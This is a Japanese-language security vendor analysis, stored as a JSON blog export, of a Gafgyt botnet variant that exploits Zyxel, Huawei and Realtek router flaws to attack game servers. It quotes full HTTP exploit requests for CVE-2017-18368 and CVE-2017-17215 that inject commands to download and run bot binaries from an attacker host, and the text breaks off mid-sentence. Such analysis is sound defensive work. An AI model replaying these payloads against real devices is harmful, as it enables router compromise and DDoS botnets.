{"id":100731,"date":"2019-11-05T21:19:46","date_gmt":"2019-11-06T05:19:46","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=100731\/"},"modified":"2019-11-05T21:27:23","modified_gmt":"2019-11-06T05:27:23","slug":"home-small-office-wireless-routers-exploited-to-attack-gaming-servers","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","title":{"rendered":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>2019\u5e749\u6708\u3001\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u8abf\u67fb\u30c1\u30fc\u30e0Unit 42\uff08\u65e7Zingbox security research\uff09\u306f\u3001\u65e5\u5e38\u7684\u306b\u5b9f\u65bd\u3057\u3066\u3044\u308b\u30d7\u30ed\u30a2\u30af\u30c6\u30a3\u30d6\u306aIoT\u8105\u5a01\u306e\u30cf\u30f3\u30c6\u30a3\u30f3\u30b0\u4e2d\u3001IoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3057\u3088\u3046\u3068\u3059\u308b\u65b0\u305f\u306aGafgyt\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u4e9c\u7a2e\u306f\u3001\u7279\u306bZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7528\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u3067\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3001<a href=\"https:\/\/www.virustotal.com\/gui\/file\/04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc\/details\"><em>JenX<\/em><\/a>\u3068\u7af6\u5408\u3059\u308b\u3082\u306e\u3067\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u3088\u308a\u30a2\u30af\u30bb\u30b9\u6a29\u9650\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08\u7279\u306bValve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3057\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\uff08DoS\uff09\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002<\/p>\n<p>\u4eca\u56de\u767a\u898b\u3055\u308c\u305fGafgyt\u4e9c\u7a2e\u306f\u3053\u306e\u307b\u304b\u306b\u3082\u3001Instagram\u3067\u306e\u8ca9\u58f2\u304c\u591a\u6570\u78ba\u8a8d\u3055\u308c\u305f\u985e\u4f3c\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3068\u3082\u7af6\u5408\u3057\u3066\u3044\u307e\u3059\u3002Shodan\u306e\u30b9\u30ad\u30e3\u30f3\u306b\u3088\u308c\u3070\u3001Gafgyt\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u5bfe\u3057\u3066\u6f5c\u5728\u7684\u306b\u8106\u5f31\u306a\u7121\u7dda\u30eb\u30fc\u30bf\u30fc\u306f\u3001\u65e5\u672c\u3082\u542b\u3081\u4e16\u754c\u4e2d\u30673\u4e072,000\u53f0\u4ee5\u4e0a\u306b\u306e\u307c\u308a\u3001\u4ee5\u4e0b\u306b\u793a\u3059\u3068\u304a\u308aGafgyt\u306f<em>JenX<\/em>\u3088\u308a\u3082\u60aa\u7528\u3059\u308b\u8106\u5f31\u6027\u304c1\u3064\u591a\u3044\u3053\u3068\u304c\u308f\u304b\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-18368\">CVE-2017-18368<\/a>: ZYXEL P660HN-T1A (\u3053\u306eGafgyt\u4e9c\u7a2e\u3067\u65b0\u3057\u304f\u8ffd\u52a0\u3055\u308c\u305f\u8106\u5f31\u6027)<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a>: Huawei HG532 (<em>JenX<\/em>\u3067\u3082\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u8106\u5f31\u6027)<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>: Realtek RTL81XX Chipset (<em>JenX<\/em>\u3067\u3082\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u8106\u5f31\u6027)<\/li>\n<\/ul>\n<h4>\u72d9\u308f\u308c\u308bIoT\u30c7\u30d0\u30a4\u30b9\u306f\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7528\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc<\/h4>\n<p>2016\u5e74\u4ee5\u964d\u3001\u3042\u3089\u3086\u308b\u696d\u7a2e\u306e\u7d44\u7e54\u306b\u6700\u3082\u4e00\u822c\u7684\u306b\u5b58\u5728\u3059\u308bIoT\u30c7\u30d0\u30a4\u30b9\u306e1\u3064\u3068\u3057\u3066\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u304cIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u72d9\u308f\u308c\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u3053\u306e\u7d50\u679c\u3001\u4fb5\u5bb3\u3092\u53d7\u3051\u305f\u4f01\u696d\u306e\u672c\u756a\u74b0\u5883\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3084IP\u30a2\u30c9\u30ec\u30b9\u306e\u30ec\u30d4\u30e5\u30c6\u30fc\u30b7\u30e7\u30f3\uff08\u8a55\u5224\uff09\u304c\u8cb6\u3081\u3089\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u5178\u578b\u7684\u306a\u8f9e\u66f8\u653b\u6483\uff08\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304ctelnet\u306a\u3069\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4fdd\u8b77\u3055\u308c\u3066\u3044\u306a\u3044\u30b5\u30fc\u30d3\u30b9\u3092\u4ecb\u3057\u3066\u30c7\u30d0\u30a4\u30b9\u306b\u30ed\u30b0\u30a4\u30f3\u3057\u3088\u3046\u3068\u3059\u308b\u653b\u6483\uff09\u306b\u4ee3\u3048\u3066\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u4f7f\u7528\u3057\u3066IoT\u30c7\u30d0\u30a4\u30b9\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c\u767b\u5834\u3057\u3066\u304d\u3066\u3044\u307e\u3059\u3002\u305f\u3068\u3048IoT\u30c7\u30d0\u30a4\u30b9\u7ba1\u7406\u8005\u304c\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4fdd\u8b77\u3055\u308c\u3066\u3044\u306a\u3044\u30b5\u30fc\u30d3\u30b9\u3092\u7121\u52b9\u5316\u3057\u3001\u5f37\u529b\u306a\u30ed\u30b0\u30a4\u30f3\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u9069\u7528\u3057\u3066\u3044\u3066\u3082\u3001\u3053\u3046\u3057\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u4f7f\u7528\u3055\u308c\u308c\u3070\u3001\u3053\u308c\u3089IoT\u30c7\u30d0\u30a4\u30b9\u3092\u4ecb\u3057\u3066\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u3088\u308a\u7c21\u5358\u306b\u62e1\u5f35\u3067\u304d\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p>Gafgyt\u306f2014\u5e74\u306b\u767a\u898b\u3055\u308c\u305f\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067\u3001\u5927\u898f\u6a21DDoS\uff08\u5206\u6563\u578b\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\uff09\u653b\u6483\u3092\u958b\u59cb\u3067\u304d\u308b\u3053\u3068\u304b\u3089\u5e83\u304f\u5229\u7528\u3055\u308c\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u305d\u308c\u4ee5\u6765\u3001\u3053\u308c\u306f\u591a\u304f\u306e\u4e9c\u7a2e\u3078\u3068\u9032\u5316\u3057\u3001\u3042\u3089\u3086\u308b\u696d\u754c\u306e\u3055\u307e\u3056\u307e\u306a\u30c7\u30d0\u30a4\u30b9\u3092\u6a19\u7684\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3088\u304f\u77e5\u3089\u308c\u3066\u3044\u308b\u3053\u3068\u3067\u3059\u304c\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3068\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u306e\u9593\u306b\u306f\u5f37\u3044\u95a2\u9023\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u3059\u3067\u306b<em>JenX<\/em>\u3068\u3044\u3046\u985e\u4f3c\u4e9c\u7a2e\u306b\u95a2\u3059\u308b\u30ec\u30dd\u30fc\u30c8\u304c<a href=\"https:\/\/blog.radware.com\/security\/2018\/02\/jenx-los-calvos-de-san-calvicie\/\">Radware<\/a>\u304b\u3089\u516c\u958b\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u306e\u985e\u4f3c\u4e9c\u7a2e\u306f<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a>\u3068<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>\u3092\u60aa\u7528\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u8106\u5f31\u6027\u306f\u305d\u308c\u305e\u308cHuawei HG532\u3001Realtek RTL81<em>XX<\/em>\u3068\u3044\u3046\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u5b58\u5728\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u4eca\u56de\u3001\u79c1\u305f\u3061\u8abf\u67fb\u30c1\u30fc\u30e0\u306f\u3001\u66f4\u65b0\u3055\u308c\u305fGafgyt\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4e9c\u7a2e\uff08SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07<\/span>\uff09\u304c\u3001<em>JenX<\/em>\u306b\u7531\u6765\u3059\u308b\u4e9c\u7a2e\u3067\u3042\u308b\u3053\u3068\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u307e\u305f\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u5206\u6790\u7d50\u679c\u304b\u3089\u3001Gafgyt\u304c\u6a19\u7684\u3068\u3059\u308b\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306e\u6570\u306f\u3001\u5143\u3068\u306a\u3063\u305f<em>JenX<\/em>\u30de\u30eb\u30a6\u30a7\u30a2\u3088\u308a1\u3064\u591a\u304f\u30013\u7a2e\u985e\u5b58\u5728\u3059\u308b\u3053\u3068\u3092\u7a81\u304d\u6b62\u3081\u307e\u3057\u305f\u3002<\/p>\n<ul>\n<li>Zyxel P660HN-T1A: Gafgyt\u3067\u8ffd\u52a0\u3055\u308c\u305f\u30e2\u30c7\u30eb<\/li>\n<li>Huawei HG532 : <em>JenX<\/em>\u3068\u540c\u3058\u6a19\u7684\u30e2\u30c7\u30eb<\/li>\n<li>Realtek RTL81<em>XX<\/em>: <em>JenX<\/em>\u3068\u540c\u3058\u6a19\u7684\u30e2\u30c7\u30eb<\/li>\n<\/ul>\n<p>Gafgyt\u306f3\u3064\u306e\u300c\u30b9\u30ad\u30e3\u30ca\u300d\u3092\u4f7f\u3044\u3001\u4e0a\u8a183\u3064\u306e\u30eb\u30fc\u30bf\u30fc\u306b\u5b58\u5728\u3059\u308b\u65e2\u77e5\u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u30b9\u30ad\u30e3\u30ca\u306f\u3001\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067\u3088\u304f\u898b\u3089\u308c\u308b\u5178\u578b\u7684\u306a\u8f9e\u66f8\u653b\u6483\u306b\u4ee3\u308f\u308b\u3082\u306e\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_100616\" aria-describedby=\"caption-attachment-100616\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100616 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png\" alt=\"\u56f31 \u30b5\u30f3\u30d7\u30eb\u3067\u898b\u3064\u304b\u3063\u305f\u30b9\u30ad\u30e3\u30ca\u7528\u95a2\u6570\" width=\"600\" height=\"64\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-300x32.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-768x82.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-900x96.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-370x39.png 370w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample.png 1128w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100616\" class=\"wp-caption-text\">\u56f31 \u30b5\u30f3\u30d7\u30eb\u3067\u898b\u3064\u304b\u3063\u305f\u30b9\u30ad\u30e3\u30ca\u7528\u95a2\u6570<\/figcaption><\/figure>\n<p>\u4ee5\u524d\u306eGafgyt\u4e9c\u7a2e\u3067\u3082\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306e\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u304c\u3001\u4eca\u56de\u306e\u4e9c\u7a2e\u306f\u6b21\u306e3\u3064\u306e\u7279\u5b9a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u30921\u3064\u306e\u30b5\u30f3\u30d7\u30eb\u5185\u306b\u4f75\u305b\u6301\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-18368\">CVE-2017-18368<\/a>: ZYXEL P660HN-T1A<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a>: Huawei HG532<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>: Realtek RTL81XX Chipset<\/li>\n<\/ul>\n<p>\u3053\u308c\u3089\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u611f\u67d3\u5bfe\u8c61\u30c7\u30d0\u30a4\u30b9\u306e\u7a2e\u985e\u306b\u5fdc\u3058\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u5bfe\u5fdc\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u3092\u53d6\u5f97\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u30c9\u30ed\u30c3\u30d1\u30fc\u3068\u3057\u3066\u6a5f\u80fd\u3059\u308b\u3088\u3046\u3001\u4f5c\u6210\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<h4><strong>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c81: CVE-2017-18368 (ZYXEL P660HN-T1A\u7528)<\/strong><\/h4>\n<p>\u6700\u521d\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001Zyxel P660HN\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u5b58\u5728\u3059\u308b\u30ea\u30e2\u30fc\u30c8\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u524d\u8eab\u3068\u306a\u3063\u305f\u4e9c\u7a2e<em>JenX<\/em>\u3067\u306f\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u304b\u3063\u305f\u3082\u306e\u3067\u3059\u3002TrueOnline\u304c\u63d0\u4f9b\u3059\u308bZyxel P660HN-T1A\u306b\u306f\u3001\u30ea\u30e2\u30fc\u30c8\u30b7\u30b9\u30c6\u30e0\u306e\u30ed\u30b0\u8ee2\u9001\u3092\u884c\u3046\u95a2\u6570\u306b\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u5b58\u5728\u3057\u3001\u8a8d\u8a3c\u3055\u308c\u3066\u3044\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u30a2\u30af\u30bb\u30b9\u3092\u8a31\u3057\u307e\u3059\u3002\u3053\u306e\u8106\u5f31\u6027\u306fViewLog.asp\u30da\u30fc\u30b8\u306b\u5b58\u5728\u3057\u3001\u6b21\u306b\u793a\u3057\u305f\u3088\u3046\u306b<span style=\"font-family: 'courier new', courier, monospace;\">remote_host<\/span>\u30d1\u30e9\u30e1\u30fc\u30bf\u30fc\u3092\u4ecb\u3057\u3066\u60aa\u7528\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true \">POST \/cgi-bin\/ViewLog.asp HTTP\/1.1Host: 127.0.0.1Connection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nUser-Agent: Ankit\r\nContent-Length: 176\r\nContent-Type: application\/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&amp;remote_syslog_Flag=1&amp;RemoteSyslogSupported=1&amp;LogFlag=0&amp;remote_hos\r\nt=%3bcd+\/tmp;wget+http:\/\/185.172.110[.]224\/arm7;chmod+777+arm7;.\/arm7 \r\nzyxel;rm+-rf+arm7%3b%23&amp;remoteSubmit=Save<\/pre>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f<span style=\"font-family: 'courier new', courier, monospace;\">zyxelscanner_scanner_init()<\/span>\u95a2\u6570\u5185\u306b\u5b58\u5728\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100618\" aria-describedby=\"caption-attachment-100618\" style=\"width: 695px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100618 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png\" alt=\"\u56f32 zyxelscanner_scanner_init()\u5185\u3067\u898b\u3064\u304b\u3063\u305fZyxel\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\" width=\"695\" height=\"182\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png 695w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init-300x79.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init-370x97.png 370w\" sizes=\"(max-width: 695px) 100vw, 695px\" \/><\/a><figcaption id=\"caption-attachment-100618\" class=\"wp-caption-text\">\u56f32 zyxelscanner_scanner_init()\u5185\u3067\u898b\u3064\u304b\u3063\u305fZyxel\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/figcaption><\/figure>\n<h4><strong>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c82: CVE-2017-17215 (Huawei HG532\u7528)<\/strong><\/h4>\n<p>2\u756a\u76ee\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001Huawei HG532\u30eb\u30fc\u30bf\u30fc\u3067\u898b\u3064\u304b\u3063\u305f\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30d1\u30b1\u30c3\u30c8\u309237215\/tcp\u306b\u9001\u4fe1\u3059\u308b\u3053\u3068\u3067\u653b\u6483\u3092\u958b\u59cb\u53ef\u80fd\u3067\u3059\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u6210\u529f\u3059\u308b\u3068\u3001\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u304c\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u5b9f\u884c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true \">POST \/ctrlt\/DeviceUpgrade_1 HTTP\/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: *\/*\r\nAuthorization: Digest username=\u201cdslf-config\u201d, realm=\u201cHuaweiHomeGateway\u201d,\r\nnonce=\u201c88645cefb1f9ede0e336e3569d75ee30\u201d, uri=\u201c\/ctrlt\/DeviceUpgrade_1\u201d, \r\nresponse=\u201c3612f843a42db38f48f59d2a3597e19c\u201d, algorithm=\u201cMD5\u201d, qop=\u201cauth\u201d, nc=00000001, \r\ncnonce=\u201c248d1a2560100669\u201d\r\n<!--?xml version=\"1.0\" encoding=\"UTF-8\"?-->&lt;s:Envelope xmlns:s=\u201chttp:\/\/schemas.xmlsoap.org\/soap\/envelope\/\u201d \r\ns:encodingStyle=\u201chttp:\/\/schemas.xmlsoap.org\/soap\/encoding\/\u201d&gt;&lt;s:Body&gt;&lt;u:Upgrade \r\nxmlns:u=\u201curn:schemas-upnp-org:service:WANPPPConnection:1\u201d&gt;&lt;NewStatusURL&gt;$(\/bin\/busybox \r\nwget -g 185.172.110[.]224 -l \r\n\/tmp\/mips -r \/mips; \/bin\/busybox chmod 777 * \/tmp\/mips; \/tmp\/mips \r\nhuawei)&lt;\/NewStatusURL&gt;&lt;NewDownloadURL&gt;$(echo HUAWEIUPNP)&lt;\/NewDownloadURL&gt;&lt;\/u:Upgrade&gt;&lt;\/s:Body&gt;&lt;\/s:Envelope&gt;<\/pre>\n<p>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f<span style=\"font-family: 'courier new', courier, monospace;\">huaweiscanner_scanner_init()<\/span>\u95a2\u6570\u304b\u3089\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100621\" aria-describedby=\"caption-attachment-100621\" style=\"width: 664px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100621 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png\" alt=\"\u56f33 huaweiscanner_scanner_init()\u5185\u3067\u898b\u3064\u304b\u3063\u305fHuawei\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\" width=\"664\" height=\"264\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png 664w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init-300x119.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init-370x147.png 370w\" sizes=\"(max-width: 664px) 100vw, 664px\" \/><\/a><figcaption id=\"caption-attachment-100621\" class=\"wp-caption-text\">\u56f33 huaweiscanner_scanner_init()\u5185\u3067\u898b\u3064\u304b\u3063\u305fHuawei\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/figcaption><\/figure>\n<h4><strong>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c83: CVE-2014-8361 (Realtek RTL81XX Chipset\u7528)<\/strong><\/h4>\n<p>3\u756a\u76ee\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f2014\u5e74\u306bRealtek\u30eb\u30fc\u30bf\u30fc\u306e\u4e00\u90e8\u306b\u3064\u3044\u3066\u5831\u544a\u3055\u308c\u305f\u6df1\u523b\u306a\u6b20\u9665\u3092\u7a81\u304f\u3082\u306e\u3067\u3001\u3053\u308c\u306b\u3088\u308a\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u539f\u56e0\u306fRealtek SDK\u304c\u5b9f\u88c5\u3057\u305fminiigd SOAP\u30b5\u30fc\u30d3\u30b9\u306b\u3042\u308a\u307e\u3059\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u6210\u529f\u3059\u308b\u3068\u3001\u5de7\u5999\u306b\u7d30\u5de5\u3055\u308c\u305f<span style=\"font-family: 'courier new', courier, monospace;\"><em>NewInternalClient<\/em><\/span>\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4ecb\u3057\u3066\u3001\u30ea\u30e2\u30fc\u30c8\u306e\u653b\u6483\u8005\u306b\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p><img width=\"700\" height=\"323\"  class=\"wp-image-100583 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42.png 700w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42-300x138.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42-370x171.png 370w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/p>\n<p>\u3053\u306e3\u756a\u76ee\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001 <span style=\"font-family: 'courier new', courier, 